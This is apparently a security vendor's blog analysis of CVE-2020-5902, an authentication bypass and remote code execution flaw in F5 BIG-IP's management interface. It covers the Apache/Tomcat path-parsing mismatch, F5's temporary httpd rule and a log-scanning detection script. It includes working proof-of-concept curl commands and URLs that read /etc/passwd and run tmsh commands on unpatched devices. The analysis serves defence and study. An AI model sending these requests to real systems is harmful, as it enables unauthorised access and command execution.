CVE-2020–5902 Analysis, F5 BIG-IP RCE Vulnerability

CertiK
Jul 2, 2020 · 5 min read

Last weekend, the cybersecurity sphere was in a buzz about the new entry in the Common Vulnerabilities and Exposures database: CVE-2020–5902, a remote code execution vulnerability in F5 BIG-IP devices. Most of the discussion thus far has focused on how to find targets and exploit vulnerabilities; however, one of CertiK’s security researchers decided it was time to do some digging. He downloaded the vulnerable program, built the environment to reproduce the vulnerability, and analyzed the cause of the vulnerability. Read on to learn what he discovered.

BIG-IP devices, made by F5 Networks, integrate functions such as network traffic management, application security management, and load balancing. In other words, they are hardware appliances with built-in functionality that makes networks more efficient, reliable, and secure. Mikhail Klyuchnikov, a researcher at Positive Technologies, discovered a remote code execution vulnerability in its Traffic Management User Interface (TMUI), registered under CVE-2020–5902.

The CVSS score for this vulnerability is 10, which means it’s a critical issue that has major repercussions if exploited. An attacker can use the vulnerability to create or delete files, shut down services, execute arbitrary system commands, and ultimately gain full control of the server.

For the full CVE description, please refer to the reference link.

Affected BIG-IP Software Versions

  • 15.0.0–15.1.0.3
  • 14.1.0–14.1.2.5
  • 13.1.0–13.1.3.3
  • 12.1.0–12.1.5.1
  • 11.6.1–11.6.5.1

Proof-of-Concept Exploit

Arbitrary file read:

curl -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'

Remote tmsh command execution:

curl -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

Temporary fix provided by F5 (discussed in further detail below):

Reproducing the Vulnerability

Download the image file for VMware Fusion, named: “BIGIP-15.0.0–0.0.39.ALL_1SLOT-vmware.ova-Image fileset for VMware ESX/i Server”

Import virtual machine image in VMware Fusion:

Use the default credentials to log in to the virtual machine.

Username: root

Password: default

After the system is fully initialized, use the command ‘ifconfig’ to obtain the IP address for the virtual machine. The IP address for our virtual machine is 172.16.4.137.

Visit the BIG-IP TMUI login interface https://172.16.4.137/tmui/login.jsp in a browser.

Proof-of-Concept for arbitrary file read

Visit the url below for the content of /etc/passwd

https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

Proof-of-Concept for tmsh command execution

Visit the url below to execute the tmsh command list auth user admin

https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

Vulnerability Analysis

Before jumping into the vulnerability detail, we want to mention that the fileRead.jsp and tmshCmd.jsp files can be accessed by authenticated users by default.

To access fileRead.jsp, an authenticated user can use the following URL:

https://172.16.4.137/tmui/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

The following GIF shows the difference between visiting the URL prior to and after login; unauthenticated sessions will result in the user being redirected to the login page.

Although fileRead.jsp and tmshCmd.jsp are used in the Proof-of-Concept exploit, they are not the problem here. The root cause of the vulnerability is that Apache and Java (Tomcat) parse the URL differently, allowing users to bypass authentication and invoke JSP modules. This type of vulnerability was covered in the 2018 Black Hat talk by Orange Tsai, “Breaking Parser Logic: Take Your Path Normalization Off and Pop 0days Out!”. Check out the presentation here.

Back to the CVE, the BIG-IP application server parses the URL twice. The first parsing is done by httpd (Apache) and the second time by Java (Tomcat).

When the URL is parsed by Apache for the first time, Apache cares only about the first half of the URL:

https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

Apache sees login.jsp, a page that unauthenticated users are allowed to visit. To Apache the /..;/ segment is not a parent-directory reference (the trailing semicolon makes it an ordinary segment name), so it is left in place and the URL is passed on unchanged to the second parser.

When the URL is parsed for the second time by Java (Tomcat), the semicolon is treated as the start of a path parameter and stripped, so /..;/ becomes /../, “back up one level of directory”. Now /login.jsp/ and /..;/ cancel each other out.

The URL changes from

https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

to:

https://172.16.4.137/tmui/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

The fileRead.jsp file gets executed and returns the contents of the /etc/passwd file.

Based on what we’ve already mentioned, we can also find another URL to exploit the vulnerability, such as:

https://172.16.4.137/tmui/tmui/login/legal.html/..;/..;/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

Here, https://172.16.4.137/tmui/tmui/login/legal.html is similar to login.jsp: it is a page that doesn't require authentication. However, we need two /..;/ segments to offset /login/legal.html.

Back to the temporary fix mentioned by F5, the fix is to add the following rule in the httpd config:

include '
<LocationMatch ".*\.\.;.*">
Redirect 404 /
</LocationMatch>
'

The rule configures httpd to return 404 Not Found for any request whose URL path contains the pattern ..; instead of passing the request on to the second (Tomcat) layer in the backend.
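As an added illustration (not code from the original article or from F5), the following Python script models the two parsing steps described above and the LocationMatch mitigation, then applies the same logic to a few constructed httpd access-log lines the way a defender hunting for this pattern would. The URLs are the ones from the write-up; the list of unauthenticated locations, the log lines and the client addresses are constructed assumptions, and both parser models are deliberately simplified.

```python
import re

# Constructed sample request paths: the two bypass URLs from the write-up, the
# legitimate login page, and a direct (authenticated-only) request to fileRead.jsp.
SAMPLE_PATHS = [
    "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd",
    "/tmui/tmui/login/legal.html/..;/..;/locallb/workspace/fileRead.jsp?fileName=/etc/passwd",
    "/tmui/login.jsp",
    "/tmui/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd",
]

# Assumption: the locations httpd serves without a session, modelled as prefixes.
UNAUTHENTICATED_PREFIXES = ("/tmui/login.jsp", "/tmui/tmui/login/")

# The regex from F5's temporary LocationMatch mitigation.
MITIGATION = re.compile(r".*\.\.;.*")

# Constructed Apache combined-format log lines (hypothetical client addresses).
LOG_LINES = [
    '10.0.0.5 - - [02/Jul/2020:10:00:01 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 5120',
    '10.0.0.9 - - [02/Jul/2020:10:00:07 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 1870',
    '10.0.0.9 - - [02/Jul/2020:10:00:09 +0000] "GET /tmui/tmui/login/legal.html/..;/..;/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin HTTP/1.1" 200 640',
]
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def _collapse(segments):
    """Resolve '.' and '..' segments the way a path normaliser does."""
    out = [""]  # the leading "" keeps the leading slash on join
    for seg in segments:
        if seg == "..":
            if len(out) > 1:
                out.pop()
        elif seg == ".":
            continue
        else:
            out.append(seg)
    return "/".join(out)


def apache_view(path):
    """Simplified front-end httpd: it collapses only literal '..' segments, so
    '..;' is an ordinary segment name to it and stays in the path."""
    path = path.split("?", 1)[0]
    return _collapse(path.lstrip("/").split("/"))


def tomcat_view(path):
    """Simplified servlet container: ';' starts a path parameter, which is
    stripped from each segment before normalisation, so '..;' becomes '..'."""
    path = path.split("?", 1)[0]
    segments = [seg.split(";", 1)[0] for seg in path.lstrip("/").split("/")]
    return _collapse(segments)


def classify(path):
    """What each layer sees, whether their authorization decisions diverge,
    and whether F5's mitigation rule would have rejected the request."""
    a, t = apache_view(path), tomcat_view(path)
    allowed_by_httpd = a.startswith(UNAUTHENTICATED_PREFIXES)
    return {
        "apache_path": a,
        "tomcat_path": t,
        "httpd_allows_unauthenticated": allowed_by_httpd,
        "mismatch": a != t,
        # httpd lets it through without a session, but Tomcat resolves it to a
        # resource outside the unauthenticated locations.
        "auth_bypass": allowed_by_httpd and not t.startswith(UNAUTHENTICATED_PREFIXES),
        "blocked_by_mitigation": MITIGATION.match(path.split("?", 1)[0]) is not None,
    }


def scan_access_log(lines):
    """Return (client, raw_uri) pairs for logged requests whose raw URI would
    be authorized by httpd but resolved by Tomcat to a protected resource."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m and classify(m.group(1))["auth_bypass"]:
            hits.append((line.split(" ", 1)[0], m.group(1)))
    return hits


if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        print(p, classify(p), sep="\n  ")
    print("suspicious log entries:", scan_access_log(LOG_LINES))
```

Note that the "mismatch" flag alone also fires on harmless path parameters such as ;jsessionid=..., which Tomcat strips just the same; the "auth_bypass" flag, which compares the authorization decision each layer would make, is the signal worth alerting on, and it is what scan_access_log uses.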

How CertiK Can Help

CertiK’s security team helps you secure your programs and gives you peace of mind by monitoring for emerging threats, alerting you to vulnerabilities as soon as they are discovered, and providing the details and recommendations needed to implement protective measures. This helps ensure that your system stays secure against attacks.

When new vulnerabilities are discovered, our team of security researchers is interested not only in learning how to exploit them, but also in exploring the root cause behind them. We use these opportunities to accumulate experience and knowledge that better train our team to find hidden loopholes in complex systems.

For the latest updates, follow us on Twitter (@certik.io) or subscribe to our mailing list.

References

Originally published at https://certik.io on July 7, 2020.
